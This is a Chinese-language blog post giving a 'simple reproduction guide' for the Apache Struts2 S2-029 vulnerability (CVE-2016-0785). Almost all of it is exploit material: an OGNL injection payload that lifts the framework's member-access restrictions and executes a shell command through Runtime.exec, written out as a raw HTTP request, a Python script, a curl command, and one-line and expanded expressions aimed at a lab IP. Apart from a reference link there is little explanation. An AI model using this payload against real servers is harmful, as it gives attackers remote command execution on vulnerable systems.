Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

CVE-2016-0785 Apache Struts2 S2-029 简易复现指南

wpadmin~August 16, 2019 /InfoSec

Contents

CVE-2016-0785 Apache Struts2 S2-029 简易复现指南

HTTP RAW Request

GET /default.action?message=(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtectedAccess%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream())) HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=DC8A865B2DD3DFAFA5E48DAB89B0E6DC
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Python

import requests

burp0_url = "http://192.168.198.133:80/default.action?message=(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtectedAccess%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream()))"
burp0_cookies = {"JSESSIONID": "DC8A865B2DD3DFAFA5E48DAB89B0E6DC"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0"}
requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)

Curl

curl -i -s -k  -X $'GET' \
    -H $'Host: 192.168.198.133' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: JSESSIONID=DC8A865B2DD3DFAFA5E48DAB89B0E6DC' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \
    -b $'JSESSIONID=DC8A865B2DD3DFAFA5E48DAB89B0E6DC' \
    $'http://192.168.198.133/default.action?message=(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtectedAccess%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream()))'

正文

关键 OGNL 表达式

一行版

(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))

分离版

(
#_memberAccess['allowPrivateAccess']=true,
#_memberAccess['allowProtectedAccess']=true,
#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],
#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],
#_memberAccess['allowPackageProtectedAccess']=true,
#_memberAccess['allowStaticMethodAccess']=true,
@org.apache.commons.io.IOUtils@toString(
    @java.lang.Runtime@getRuntime().exec('id').getInputStream()
    )
)

参考资料

Struts2-S2-029漏洞分析
https://www.iswin.org/2016/03/20/Struts2-S2-029%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

Leave a Reply

Your email address will not be published. Required fields are marked *